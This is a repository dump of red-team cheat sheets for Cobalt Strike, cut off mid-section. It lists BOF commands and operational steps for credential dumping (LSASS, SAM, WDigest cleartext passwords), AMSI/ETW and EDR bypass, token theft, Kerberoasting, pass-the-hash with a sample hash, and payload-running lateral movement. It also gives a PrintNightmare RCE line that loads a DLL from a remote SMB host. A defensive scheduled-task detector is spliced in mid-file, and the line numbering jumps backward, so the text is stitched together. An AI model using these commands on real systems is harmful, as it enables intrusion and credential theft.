├── CobaltStrike
│   ├── BOF_Collections.md
│   └── RedTeam_CheatSheet.md
├── README.md
└── SliverC2
    └── README.md
/CobaltStrike/BOF_Collections.md:
--------------------------------------------------------------------------------
# CobaltStrike BOF Collections
Useful Cobalt Strike Beacon Object Files (BOFs) used during red teaming and penetration testing engagements.

---
### Enumeration

- [**TrustedSec Situational Awareness BOF**](https://github.com/trustedsec/CS-Situational-Awareness-BOF)
BOF that provides host enumeration and situational awareness commands that are more OPSEC-friendly.
Example commands include:
```
arp --> List arp tables
ipconfig --> Run ipconfig
ldapsearch [query]
listdns --> Pulls DNS cache
netuser [username] [opt: domain] --> Get info on user account
nslookup [hostname] --> Perform DNS query
tasklist --> Get local running processes
```

- [**Find Objects BOF**](https://github.com/outflanknl/FindObjects-BOF)
Uses direct system calls to enumerate processes for specific loaded modules (amsi.dll, clr.dll) or process handles (lsass.exe).
Avoids fork & run.
```
FindModule amsi.dll
FindProcHandle lsass.exe
```

- [**BOF Collection**](https://github.com/rvrsh3ll/BOF_Collection)
A set of BOFs useful for enumeration and exploitation. Examples include:
```
inline-execute GetDomainInfo.o --> Get domain info from DC

inline-execute GetClipboard.o --> Prints any text on the user's clipboard

enumwifi --> Enumerate wifi connections
dumpwifi Wifi_Profile_Name --> Dump wifi cleartext credentials

bofportscan 192.168.1.10 3389 --> Port scanner

inline-execute RegistryPersistence.o Install --> Install registry persistence
inline-execute RegistryPersistence.o Remove --> Remove registry persistence
```

- [**whereami**](https://github.com/boku7/whereami)
A "Where Am I" BOF: an OPSEC-safe alternative to running the whoami.exe binary that pulls the information from the current Beacon process's memory.
Also pulls the current environment variables.
`whereami`

- [**RiccardoAncarani BOFs**](https://github.com/RiccardoAncarani/BOFs)
A useful BOF collection to perform various tasks in a safer OPSEC way.
```
send_shellcode_via_pipe --> Send shellcode or any bytes via a named pipe
cat --> Read file, supports remote shares
wts_enum_remote_processes --> Enumerate remote processes using WTS APIs
unhook, unhook ntdll.dll --> Use direct syscalls to unhook APIs of a specific DLL (works only on 64-bit beacons)
```

- [**Outflank C2 Tool Collection**](https://github.com/outflanknl/C2-Tool-Collection)
Great list of useful tools converted to BOFs for better OPSEC.
Tools like add machine account, kerberoast, LAPS password dump, SMB info, LDAP AD spray, and more!
```
GetMachineAccountQuota --> Get domain machine account quota
AddMachineAccount [*Computername] [Optional Password] --> Create new machine account - requires MachineAccountQuota to create new account
Domaininfo --> Enumerate AD domain
Kerberoast list --> List SPN enabled accounts
Kerberoast roast SamAccountName --> Kerberoast specific username
Lapsdump --> Dump LAPS passwords on remote systems within AD (requires elevated privileges on target)
Psc --> Show detailed information from processes with established TCP and RDP connections
Psw --> Show window titles from processes with active windows
Psx --> Show detailed information from all processes running on the system and provides a summary of installed security products and tools.
Smbinfo --> Get SMB info of remote system instead of using CS portscan SMB
Winver --> Shows the version of Windows that is running on the local system
```

- [**tgtdelegation**](https://github.com/sliverarmory/tgtdelegation)
Kerberos ticket delegation - obtains usable TGTs for the current user and does not require Admin privileges!
Requests a TGT for the active user in the current domain (taken from the USERDNSDOMAIN environment variable) and outputs the TGT blobs to .kirbi and .ccache files.
```
tgtdelegation currentdomain default
[+] received output:
[+] tgtdelegation succeeded!

[+] Invoking tgtParse.py to obtain a usable .ccache!

[+] Successfully decrypted the AP-REQ response!

[+] Local path to usable .ccache: /home/loki@MARVEL.LOCAL.ccache
[+] Local path to usable .kirbi: /home/loki@MARVEL.LOCAL.kirbi
```
Now use the .ccache or .kirbi file offline on a Linux system to load the TGT into memory:
`export KRB5CCNAME=/home/loki@MARVEL.LOCAL.ccache`
Continue to use the ticket in memory with other tooling of your choice through a SOCKS proxy (e.g. Impacket's `-k -no-pass` flags).


- [**PrivKit**](https://github.com/mertdas/PrivKit)
Windows privilege escalation BOF kit used for detecting priv esc vulnerabilities including unquoted service paths, hijackable paths, autologon registry keys, etc.
Check for all supported vulnerabilities:
`privcheck`

---
### Executing .NET Assemblies

- [**InlineExecute-Assembly**](https://github.com/anthemtotheego/InlineExecute-Assembly)
Perform .NET assembly execution of any .NET executable without any prior modifications required.
The BOF also supports several flags for disabling AMSI via in-memory patching, disabling and restoring ETW via in-memory patching, or customizing the name of the CLR App Domain to be created.
```
inlineExecute-Assembly --dotnetassembly /home/Seatbelt.exe --assemblyargs AntiVirus AppLocker --etw --amsi --mailslot totallyLegitMailslot
```

- [**inject-assembly**](https://github.com/kyleavery/inject-assembly)
Another alternative .NET executable loader to inject an assembly into a running process.
`inject-assembly 0 /home/Rubeus.exe [args...]`

- [**BOF.NET**](https://github.com/CCob/BOF.NET)
Critical tool for red teams that allows you to run .NET assemblies as BOFs within the Beacon process.
```
bofnet_init --> Start BOF.NET
bofnet_listassemblies --> List loaded .NET assemblies
bofnet_load /Path/To/Assembly.exe --> Load assembly
bofnet_execute bof_name [args] --> Execute assembly
bofnet_shutdown --> Kill BOF.NET
```

- [**Modified BOF.NET**](https://github.com/williamknows/BOF.NET/tree/main)
Updated BOF.NET repo with the added `bofnet_executeassembly` command to easily call .NET assemblies.
```
bofnet_init --> Start BOF.NET
bofnet_load /Path/To/Assembly.exe --> Load assembly
bofnet_executeassembly AssemblyName arg1 arg2 arg3 --> Execute .NET assembly
bofnet_executeassembly Seatbelt -group=remote --> SeatBelt execution example
bofnet_shutdown --> Kill BOF.NET
```

---
### Exploitation

- [**ajpc500 BOFs**](https://github.com/ajpc500/BOFs)
A collection of **very** useful BOFs for various utilities including different techniques of shellcode injection with syscalls, process dumping (LSASS!), and patching ETW for better evasion.
```
etw stop --> Patch etw
syscalls_inject / syscalls_shinject --> Syscalls shellcode injection
syscalls_spawn / syscalls_shspawn --> Spawn and syscalls injections
static_syscalls_apc_spawn / static_syscalls_apc_shspawn --> Spawn and static syscalls shellcode injection (NtQueueApcThread)
static_syscalls_inject / static_syscalls_shinject --> Static syscalls shellcode injection (NtCreateThreadEx)
static_syscalls_dump [path_to_output] --> Process dump with syscalls (i.e. Dump LSASS!)
```

- [**Threadless Inject BOF**](https://github.com/iilegacyyii/ThreadlessInject-BOF)
This process injection BOF works by remotely hooking a function: you specify the target process and the DLL/function to hook for injecting the shellcode.
```
threadless-inject
threadless-inject 1234 ntdll.dll NtOpenFile shellcode.bin --> Inject into existing process
```

- [**MiniDumpWriteDump**](https://github.com/rookuu/BOFs)
Uses static syscalls to dump a process such as LSASS to an output file.
`minidumpwritedump`

- [**SilentLsassDump**](https://github.com/josephkingstone/BOFs-2/)
Uses direct syscalls generated from [InlineWhispers](https://github.com/outflanknl/InlineWhispers).
Dumps the LSASS process via the silent process exit mechanism into the C:\Temp directory.
`silentLsassDump`

- [**RegSave BOF**](https://github.com/EncodeGroup/BOF-RegSave)
BOF to dump the SAM, SYSTEM, and SECURITY databases from a local system.
```
bof-regsave c:\temp\ --> Dumps SAM database files to target folder C:\temp\
```

- [**Unhook BOF**](https://github.com/rsmudge/unhook-bof)
Created by Raphael Mudge, this BOF will attempt to unhook userland APIs to bypass EDR.
Sort of the "hail mary" for attempting to unhook APIs.
`unhook`

- [**WdToggle**](https://github.com/outflanknl/WdToggle)
Enables WDigest credential caching using direct system calls.
Bypasses Windows Credential Guard if enabled.
```
inline-execute WdToggle.o --> First enable WDigest caching
logonpasswords --> Second, wait for users to log in and then run Mimikatz to dump their newly cached cleartext passwords
```

- [**TrustedSec CS-Remote-OPs-BOF**](https://github.com/trustedsec/CS-Remote-OPs-BOF)
Great repo of new BOFs from TrustedSec to follow up their SituationalAwareness BOFs.
Includes dumping a process, decrypting Chrome keys, persistence techniques (registry, scheduled tasks, services), and more!
```
adcs_request --> Request an enrollment certificate
procdump --> Dump specified process to output file
reg_set --> Set/create a registry key
sc_create --> Create a new service
schtaskscreate --> Create a new scheduled task
setuserpass --> Set a user's password
```

192 |
193 | - [**Inject AMSI Bypass**](https://github.com/boku7/injectAmsiBypass)
194 | BOF that bypasses AMSI in a remote process with code injection
195 | ```inject-amsiBypass ```
196 |
197 | - [**Inject ETW Bypass**](https://github.com/boku7/injectEtwBypass)
198 | Inject ETW Bypass into Remote Process via Syscalls
199 | ```injectEtwBypass ```
200 |
201 | - [**Kerberoast BOF**](https://github.com/cube0x0/BofRoast)
202 | BOF for targeted Kerberoasting against input SPN to roast
203 | Returns TGS that you can pass to apreq2hashcat.py (provided in repo) to output the hashcat format
204 | ```kerberoast SPN/HOSTNAME.domain.local```
205 |
206 | - [**Koh**](https://github.com/GhostPack/Koh)
207 | GhostPack BOF that allows for the capture of user credentials via purposeful token/logon session leakage.
208 | Koh has a BOF client for capturing logon tokens in Cobalt Strike and a C# capture server to negotiate captured tokens for new logon sessions.
209 | ```
210 | # Koh client BOF
211 | help koh
212 | koh list - lists captured tokens
213 | koh groups LUID - lists the group SIDs for a captured token
214 | koh filter list - lists the group SIDs used for capture filtering
215 | koh filter add SID - adds a group SID for capture filtering
216 | koh filter remove SID - removes a group SID from capture filtering
217 | koh filter reset - resets the SID group capture filter
218 | koh impersonate LUID - impersonates the captured token with the give LUID
219 | koh release all - releases all captured tokens
220 | koh release LUID - releases the captured token for the specified LUID
221 | koh exit - signals the Koh server to exit
222 |
223 | koh list --> List current logon sessions
224 | koh impersonate --> Impersonate a logon session from above output
225 |
226 | ls \\dc.theshire.local\C$ --> Use the impersonated privileged logon session to interact with a target system
227 | ```
228 |
229 | - [**Cobalt-Clip**](https://github.com/DallasFR/Cobalt-Clip)
230 | A clipboard add-on for Cobalt Strike to interact with the victim's clipboard. With Cobalt-Clip you can dump, edit and monitor the content of a clipboard.
231 | ```
232 | dumpclip --> Dump current contents of clipboard
233 | set-clipboard-data --> Modify victims clipboard data
234 | clipmon --> Monitor the clipboard for new content and output to console
235 | ```
236 |
237 | - [**BOF-patchit**](https://github.com/ScriptIdiot/BOF-patchit/)
238 | A very easy solution to patch AMSI or ETW. Patches AMSI/ETW for the currently running x64 process.
239 | ```
240 | patchit check --> List if AMSI or ETW are currently patched
241 | patchit all --> Patch both AMSI and ETW
242 | patchit amsi --> Only patch AMSI
243 | patchit etw --> Only patch ETW
244 |
245 | # DO NEFARIOUS STUFF HERE....
246 |
247 | patchit revertAll --> Revert both AMSI and ETW
248 | patchit revertAmsi --> Revert only AMSI
249 | patchit revertEtw --> Revert only ETW
250 | ```
251 |
252 | - [**ScreenshotBOF**](https://github.com/CodeXTF2/ScreenshotBOF)
253 | Uses WinAPI and avoids fork&run to take a screenshot.
254 | `screenshot_bof output.bmp 1`
255 |
256 | - [**nanorubeus**](https://github.com/wavvs/nanorobeus)
257 | BOF equivalent of Rubeus for managing Kerberos tickets. It can be used cross-platform for multiple C2s including Cobalt Strike, Sliver and Brute Ratel.
258 | ```
259 | nanorobeus64 luid --> Get logon current ID
260 | nanorobeus64 klist --> List all Kerberos tickets
261 | nanorobeus64 dump /all --> Dump all Kerberos tickets, requires local admin privileges
262 | nanorobeus64 kerberoast /spn:HTTP/server.fortress.local --> Kerberoast a specific SPN
263 | ```
264 |
265 | ---
266 | ### Miscellaneous
267 | - [**BOF Template**](https://github.com/Cobalt-Strike/bof_template)
268 | Used for creating your very own BOFs!
269 |
270 | - [**BOF Hound**](https://github.com/fortalice/bofhound)
271 | An offline BloodHound ingestor and LDAP parser to be used with TrustedSec's ["ldapsearch"](https://github.com/trustedsec/CS-Situational-Awareness-BOF).
272 | Use ldapsearch in Cobalt Strike to gather data and then use bofhound on your CS logs to generate JSON files for importing into BloodHound.
273 | ```bofhound -o /data/```
274 |
275 | - [**Help Color**](https://github.com/outflanknl/HelpColor)
276 | Color helper Aggressor script for coloring "help" output based on command type and OPSEC
277 | ```helpx```
278 |
279 | - [**Hidden Desktop BOF**](https://github.com/WKL-Sec/HiddenDesktop)
280 | Uses VNC connection and server to create a hidden remote desktop connection to your target instead of using RDP.
281 | ```
282 | Start the HVNC server first
283 | HiddenDesktop --> Start a hidden desktop client connection to your listening server
284 | hd-launch-explorer --> Then start the Windows explorer browser which should pop up a new window on your system
285 | ```
286 |
--------------------------------------------------------------------------------
/CobaltStrike/RedTeam_CheatSheet.md:
--------------------------------------------------------------------------------
# Cobalt Strike Red Team Cheat Sheet

## Overview
- [Malleable C2 Profiles](#malleable-c2-profiles)
- [Reflective Shellcode Loaders](#reflective-shellcode-loaders)
- [Domain Enumeration](#domain-enumeration)
- [Local Privilege Escalation](#local-privilege-escalation)
- [Lateral Movement](#lateral-movement)
- [Domain Privilege Escalation](#domain-privilege-escalation)
- [Defense Evasion](#defense-evasion)
- [Exploitation](#exploitation)
- [Exfiltration - Password Attacks](#exfiltration---password-attacks)
- [Exfiltration - Email](#exfiltration---email)
- [Persistence](#persistence)
- [Cobalt Strike BOFs](#cobalt-strike-bofs)
- [References](#references)

-----------------------------------------------------------------------------------------

#### Important OPSEC notes...
For an actual red team, do NOT use `execute-assembly` at all, ever! Instead, substitute the command with [BOF.NET](https://github.com/CCob/BOF.NET/pull/1) `bofnet_executeassembly` or another .NET assembly loader BOF (e.g. [InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly)).
For everything else, use BOFs instead of `run` or `shell` commands for best OPSEC. ([BOF cheat sheet here](https://github.com/wsummerhill/C2_RedTeam_CheatSheets/blob/main/CobaltStrike/BOF_Collections.md)).

-----------------------------------------------------------------------------------------
## Malleable C2 Profiles

A collection of tools used to generate new Malleable C2 profiles to use with Cobalt Strike and better obfuscate your traffic/commands.

- [Random C2 Profile](https://github.com/threatexpress/random_c2_profile)
- [Malleable C2](https://github.com/threatexpress/malleable-c2)
- [Malleable C2 Profiles](https://github.com/xx0hcd/Malleable-C2-Profiles)
- [C2concealer](https://github.com/FortyNorthSecurity/C2concealer)
- [SourcePoint](https://github.com/Tylous/SourcePoint)

-----------------------------------------------------------------------------------------
## Reflective Shellcode Loaders

Reflective loaders to add to Cobalt Strike before generating your shellcode; they add obfuscation and encryption to the generated shellcode for better evasion.

- [AceLdr](https://github.com/kyleavery/AceLdr)
- [TitanLdr](https://github.com/benheise/TitanLdr)
- [BokuLoader](https://github.com/boku7/BokuLoader) - Bobby Cooke's reflective loader

-----------------------------------------------------------------------------------------
## Domain Enumeration

Running PowerView and SharpView
```
# PowerView:
powershell-import --> Select PowerView.ps1 to import PS1 file in memory
powershell Get-Module PowerView
powershell Get-NetUser -Identity testuser -Domain lab.com

# SharpView
execute-assembly C:\SharpView.exe Invoke-CheckLocalAdminAccess --> Check servers for local admin using current privileges
```

Running SharpHound (.NET collector for BloodHound) for AD domain collection
```
# Running SharpHound in memory (.NET version of the BloodHound collector)
execute-assembly C:\SharpHound.exe --CollectionMethod All --Domain lab.com --Stealth --excludedomaincontrollers --windowsonly --OutputDirectory C:\users\testuser\appdata\local\temp\

# Collecting only user sessions to determine who is logged in and where:
execute-assembly C:\SharpHound.exe --CollectionMethod Session,LoggedOn --Outputdirectory C:\temp\

# Collection methods reference: https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound-all-flags.html
```

[AD Recon tool](https://github.com/adrecon/ADRecon) - Perform different collection methods (ACLs, OUs, DCs, etc.) and output to Excel files
```
powershell-import --> ADRecon.ps1
# Perform all collection methods:
powershell ADRecon -OutputDir .\ -DomainController ops-dc.lab.com
```

Get domain trusts and domain controllers with the built-in `nltest.exe` utility
```
# Get all domain controllers of a domain
run nltest /dclist:domain.com
# Get domain trusts
run nltest /trusted_domains
```

### Domain SMB Share Enumeration
[PowerView](https://powersploit.readthedocs.io/en/latest)
```
powershell-import --> Select PowerView.ps1 to import PS1 file in memory
# Find all domain shares that the current user has access to
powershell Find-DomainShare -CheckShareAccess

# Find interesting domain share files
powershell Find-InterestingDomainShareFile -ComputerDomain DOMAIN.COM
```

[SharpShares](https://github.com/mitchmoser/SharpShares) - List accessible shares on remote systems and check read/write privileges
```
# Find all accessible network shares in a domain, exclude default share names (SYSVOL,netlogon,ipc$,print$), and perform read/write access checks
execute-assembly C:\SharpShares.exe /ldap:all /filter

# Find all server shares (including DCs), exclude default share names, perform read/write access checks and output to file
execute-assembly C:\SharpShares.exe /ldap:servers /filter /outfile:find-domain-shares.txt
```

[Snaffler](https://github.com/SnaffCon/Snaffler) - Automated network share enumeration to look for interesting files/creds
```
# Run Snaffler on all domain systems found, output to console and file
execute-assembly C:\snaffler.exe -d DOMAIN.COM -s -o C:\temp\snaffler.log

# Run Snaffler on only target hosts
execute-assembly C:\snaffler.exe -s -o C:\temp\snaffler2.log -n hostname1.domain.com,hostname2.domain.com,hostname3.domain.com
```

### Miscellaneous Remote Workstation/Server stuff

List and kill processes on a remote system (requires local Admin)
- Using tasklist.exe and taskkill.exe
```
run tasklist /s SERVER.domain.com --> List remote processes
run taskkill /s SERVER.domain.com /IM PROCESS.exe --> Kill remote process
```
- Using [CIMplant](https://github.com/FortyNorthSecurity/CIMplant)
```
execute-assembly CIMplant.exe -s [remote-IP-address] -c ps --> List remote processes
execute-assembly CIMplant.exe -s [remote-IP-address] -c process_kill --> Kill remote process
```
-----------------------------------------------------------------------------------------
## Local Privilege Escalation

### [PowerUp](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1) - PowerSploit module
```
powershell-import --> PowerUp.ps1
powerpick Invoke-AllChecks | Out-File -Encoding ASCII PowerUp-checks.txt
```

### [SharpUp](https://github.com/GhostPack/SharpUp) - .NET port of PowerUp
```
# Run all checks automatically - output to console
execute-assembly C:\SharpUp.exe audit

# Run an individual check
execute-assembly SharpUp.exe HijackablePaths
```

### [WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe) - Windows Privilege Escalation Awesome Script
```
# Run all checks
execute-assembly winpeas.exe
```

### [SeatBelt](https://github.com/GhostPack/Seatbelt) - .NET tool by GhostPack
GREAT tool to query a local system to gather system/user/remote/misc data
Can be used as Admin or as a normal-privileged user
```
# Run ALL checks - returns TONS of data
execute-assembly C:\SeatBelt.exe -group=all -full -outputfile="C:\Temp\SeatBelt-all.json"

# Run only user-related checks - returns things like Chrome data, DPAPI keys, IE tabs, Windows vault/credentials, etc.
execute-assembly C:\SeatBelt.exe -group=user -outputfile="C:\Temp\SeatBelt-user.json"

# Run only system-related checks - returns things like Antivirus, Applocker, env path/variables, local users/groups, WMI, sysmon, UAC, etc.
execute-assembly C:\SeatBelt.exe -group=system -outputfile="C:\Temp\SeatBelt-system.json"

# Run only Chrome checks - returns bookmarks, history, presence
execute-assembly C:\SeatBelt.exe -group=chromium -outputfile="C:\Temp\SeatBelt-chrome.json"

# Run only remote-related checks - returns things like network shares, putty sessions, RDP connections/settings, Filezilla, Windows firewall, etc.
execute-assembly C:\SeatBelt.exe -group=remote -outputfile="C:\Temp\SeatBelt-remote.json"

# Run only miscellaneous-related checks - returns things like Chrome data, logon events, LOBAS, interesting files, downloads, PS events, scheduled tasks, etc.
execute-assembly C:\SeatBelt.exe -group=misc -outputfile="C:\Temp\SeatBelt-misc.json"
```

### Watson - .NET version of Sherlock.ps1 to look for missing KBs on Windows
```
# Perform all checks and output to console
# Supports:
#   Windows 10 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004
#   Server 2016 & 2019
execute-assembly C:\Watson.exe
```

### PrintNightmare priv esc exploit (CVE-2021-1675)
```
# cube0x0's PrintNightmare (Python, Impacket-based): https://github.com/cube0x0/CVE-2021-1675
# cube0x0's SharpPrintNightmare (C#): https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare
# PowerShell PrintNightmare local priv esc: https://github.com/calebstewart/CVE-2021-1675

# Local priv esc
execute-assembly C:\SharpPrintNightmare.exe C:\addCube.dll

# RCE using existing context
execute-assembly C:\SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.20'

# RCE using runas /netonly
execute-assembly C:\SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.10' hackit.local domain_user Pass123
```

### HiveNightmare priv esc SAM dump (CVE-2021-36934)
Exploit in Windows 10 and 11 which allows you to read the SAM, SYSTEM and SECURITY hives as a low-privileged user
```
# First check privileges to read SAM hive
run icacls C:\Windows\System32\config\SAM
--> If the results show success and the group BUILTIN\Users has privileges (I)(RX) then the SAM file should be readable by all users!

# Exploit: Csharp implementation (https://github.com/cube0x0/CVE-2021-36934)
execute-assembly C:\CVE-2021-36934.exe
--> Dumps hashes to console upon successful exploitation
```

### Stealing logon tokens
If you have obtained local Administrator privileges, you can steal the token of another process to inherit that token's privileges. This might require you to escalate to a SYSTEM Beacon if it's being blocked.
`steal_token`

### Elevating to SYSTEM Beacon
Assuming you gained local administrator privileges, one option to elevate to a SYSTEM Beacon is to use schtasks to create a scheduled task that runs your payload as SYSTEM.
```
run schtasks /create /tn "TaskName" /sc once /U DOMAIN\username /P Password1! /tr "cmd.exe /c C:\path\to\Payload.exe" /ru SYSTEM
run schtasks /run /tn "TaskName" --> Should pop SYSTEM Beacon
```

------------------------------------------------------------------------------------------
## Lateral Movement
Cobalt Strike jumping (OUTDATED)
```
# Jump using WinRM if it's enabled for the current user on the target system
jump winrm64 ops-jumpbox.lab.com HTTPSLISTENER

# Jump using PsExec if it's enabled for the current user on the target system
jump psexec64 ops-jumpbox.lab.com HTTPSLISTENER
```

Cobalt Strike remote-exec - Executes commands on a target system using psexec, winrm or wmi (OUTDATED)
```
# remote-exec using WMI
remote-exec wmi ops-jumpbox.lab.com cmd.exe /c "C:\Users\Public\payload.exe"

# remote-exec using PsExec
remote-exec psexec ops-jumpbox.lab.com cmd.exe /c "C:\Users\Public\payload.exe"
```

Enable PowerShell Remoting manually
```
# Enable on local system with Admin privileges
powershell Enable-PSRemoting -Force

# Enable on remote system
make_token AD\admin Password123! --> Token with Admin privileges on remote system is required
run psexec.exe \\TestComputer.lab.com -h -s powershell.exe Enable-PSRemoting -Force

# Test remote access
powershell Invoke-Command -ComputerName TestComputer -ScriptBlock { whoami; hostname }
```

[RACE.ps1](https://github.com/samratashok/RACE): ACL attacks for lateral movement, persistence and privilege escalation
Stealthier than the above method since it doesn't touch disk
```
powershell-import --> RACE.ps1
make_token AD\Admin password --> This tool requires Admin privileges on the remote system being targeted

powershell Set-RemotePSRemoting -SamAccountName testuser -ComputerName ops-jumpbox.lab.com --> Force enable PS remoting for the specific user
powershell Set-RemoteWMI -SamAccountName testuser -Computername ops-jumpbox.lab.com --> (Optional) Force enable WMI for the specific user

# Now we can move laterally in CS with WinRM for the specified user
make_token AD\testuser password
jump [winrm/winrm64] ops-jumpbox.lab.com HTTPSLISTENER
```

Scheduled task lateral movement
```
# First copy payload files to remote system manually
# Create task on remote system
run schtasks /create /tn "MyTask" /sc once /U DOMAIN\username /P Password1! /S target-host.domain.com /tr "cmd.exe /c C:\Windows\temp\Payload.exe"
# Execute remote task
run schtasks /run /tn "MyTask" /S target-host.domain.com
```
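Both schtasks procedures on this page (the SYSTEM Beacon elevation above and the remote task creation just shown) leave the same footprint on the target: a Security event 4698 ("A scheduled task was created") whose TaskContent XML records the principal, the trigger and the action. The following is an added example, not part of the original cheat sheet, showing how a defender would score those events. The events are constructed samples; the field names (SubjectUserName, SubjectDomainName, TaskName, TaskContent) follow the 4698 schema, and the list of user-writable directories is an assumption you would tune to your estate.

```python
"""Flag suspicious scheduled-task creations from Windows Security event 4698.

Added example (not from the cheat sheet): the defender's view of the schtasks
procedures above. Events are constructed samples; field names follow the 4698
schema (SubjectUserName, SubjectDomainName, TaskName, TaskContent).
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Task Scheduler XML namespace used inside the TaskContent field of event 4698.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Built-in principals that routinely create SYSTEM tasks with no human behind them.
SERVICE_ACCOUNTS = {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}
SYSTEM_IDS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}

# Directories a SYSTEM task should rarely launch its binary from (assumed list, tune per estate).
WRITABLE_PATH_RE = re.compile(
    r"\\(temp|users\\public|appdata|programdata|windows\\temp)\\", re.IGNORECASE
)


@dataclass
class Finding:
    task: str
    creator: str
    reasons: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def analyse_task(event: dict) -> Finding:
    """Score one 4698 event; every heuristic that matches adds a reason."""
    creator = f"{event['SubjectDomainName']}\\{event['SubjectUserName']}"
    finding = Finding(task=event["TaskName"], creator=creator)
    root = ET.fromstring(event["TaskContent"])

    # /ru SYSTEM shows up as the principal's UserId; a human creator is the anomaly.
    user_id = (root.findtext("t:Principals/t:Principal/t:UserId", "", NS) or "").strip()
    if user_id.upper() in SYSTEM_IDS and event["SubjectUserName"].upper() not in SERVICE_ACCOUNTS:
        finding.reasons.append("runs as SYSTEM but was created by a non-service account")

    # /sc once yields exactly one TimeTrigger: a one-shot run rather than a schedule.
    triggers = root.find("t:Triggers", NS)
    if triggers is not None and len(triggers) == 1 and triggers[0].tag.endswith("TimeTrigger"):
        finding.reasons.append("single one-shot time trigger")

    for action in root.findall("t:Actions/t:Exec", NS):
        command = (action.findtext("t:Command", "", NS) or "").strip()
        args = (action.findtext("t:Arguments", "", NS) or "").strip()
        if command.lower().endswith("cmd.exe") and args.lower().startswith("/c"):
            finding.reasons.append("action is a cmd.exe /c wrapper")
        if WRITABLE_PATH_RE.search(command) or WRITABLE_PATH_RE.search(args):
            finding.reasons.append("binary launched from a user-writable path")
    return finding


def suspicious_tasks(events, threshold: int = 2) -> list:
    """Return findings scoring at or above the threshold, highest score first."""
    hits = [f for f in map(analyse_task, events) if f.score >= threshold]
    return sorted(hits, key=lambda f: f.score, reverse=True)


def _task_xml(user_id: str, command: str, arguments: str, trigger: str) -> str:
    """Build a minimal TaskContent blob (constructed sample, not a real capture)."""
    return (
        f'<Task xmlns="{NS["t"]}"><Triggers>{trigger}</Triggers>'
        f'<Principals><Principal id="Author"><UserId>{user_id}</UserId>'
        f"<RunLevel>HighestAvailable</RunLevel></Principal></Principals>"
        f"<Actions><Exec><Command>{command}</Command><Arguments>{arguments}</Arguments>"
        f"</Exec></Actions></Task>"
    )


ONCE = "<TimeTrigger><StartBoundary>2024-01-01T12:00:00</StartBoundary></TimeTrigger>"
DAILY = ("<CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary>"
         "<ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger>")

# Constructed 4698 events: the first mirrors the cheat sheet's schtasks usage, the others are benign.
SAMPLE_EVENTS = [
    {"SubjectUserName": "jdoe", "SubjectDomainName": "LAB", "TaskName": "\\TaskName",
     "TaskContent": _task_xml("S-1-5-18", "cmd.exe", r"/c C:\Windows\temp\Payload.exe", ONCE)},
    {"SubjectUserName": "SYSTEM", "SubjectDomainName": "NT AUTHORITY",
     "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": _task_xml("S-1-5-18", r"%windir%\system32\defrag.exe", "-c -h -o", DAILY)},
    {"SubjectUserName": "jdoe", "SubjectDomainName": "LAB", "TaskName": "\\Backup",
     "TaskContent": _task_xml("LAB\\jdoe", r"C:\Program Files\Backup\backup.exe", "--nightly", DAILY)},
]

if __name__ == "__main__":
    for hit in suspicious_tasks(SAMPLE_EVENTS):
        print(f"{hit.task} created by {hit.creator} (score {hit.score}): {'; '.join(hit.reasons)}")
```

Scoring rather than hard-matching keeps the false-positive rate manageable: a single TimeTrigger or a cmd.exe wrapper on its own is common in legitimate admin scripting, but all four heuristics together match the exact command lines shown above. For the remote variant, the event is logged on the target host, so the SubjectUserName is the account supplied with `/U`, which is what lets you tie the task back to the credential that created it.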
273 |
274 | [Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash) - PS tools to perform SMB and WMI pass-the-hash attacks
275 | ```
276 | powershell-import
277 | powerpick Invoke-WMIExec -Target 192.168.100.20 -Domain LAB.com -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose
278 | powerpick Invoke-SMBExec -Target 192.168.100.20 -Domain LAB.com -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose
279 | ```
280 |
281 | Over-pass-the-hash with Rubeus
282 | Inject a ticket into memory using known credentials and then move to a system that user has access to
283 | ```
284 | # Revert to original token in CS
285 | rev2self
286 | # Create and inject new ticket into memory
287 | execute-assembly C:\Rubeus.exe asktgt /domain:lab.com /user:admin1 /rc4: /ptt
288 | # Run network commands as that user
289 | ls \\jumpbox.lab.com\C$
290 | jump winrm64 jumpbox.lab.com
291 | ```
292 |
293 | [Move Kit](https://github.com/0xthirteen/MoveKit)
294 | Aggressor script using execute-assembly, SharpMove and SharpRPD assemblies for doing lateral movement with various techniques
295 |
296 | [SharpExec](https://github.com/anthemtotheego/SharpExec) - CSharp tooling lateral movement
297 | ```
298 | # WMI lateral movement
299 | execute-assembly SharpExec.exe -m=wmi -i=IPADDRESS -u=USER -p=PASSWORD -d=DOMAIN -e=C:\Windows\System32\cmd.exe -c="/c C:\path\to\payload"
300 |
301 | # PSExec lateral movement
302 | execute-assembly SharpExec.exe -m=psexec -i=IPADDRESS -u=USER -p=PASSWORD -d=DOMAIN -e=C:\Windows\System32\cmd.exe -c="/c C:\path\to\payload"
303 | ```
304 |
305 | ------------------------------------------------------------------------------------------
306 | ## Domain Privilege Escalation
307 | ### GPP Passwords
308 | [Get-GPPPassword.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) PowerSploit module
309 | ```
310 | # Get-GPPPassword Searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords
311 | powershell-import --> Get-GPPPassword.ps1
312 | powerpick Get-GPPPassword -Server ops-dc01.lab.com
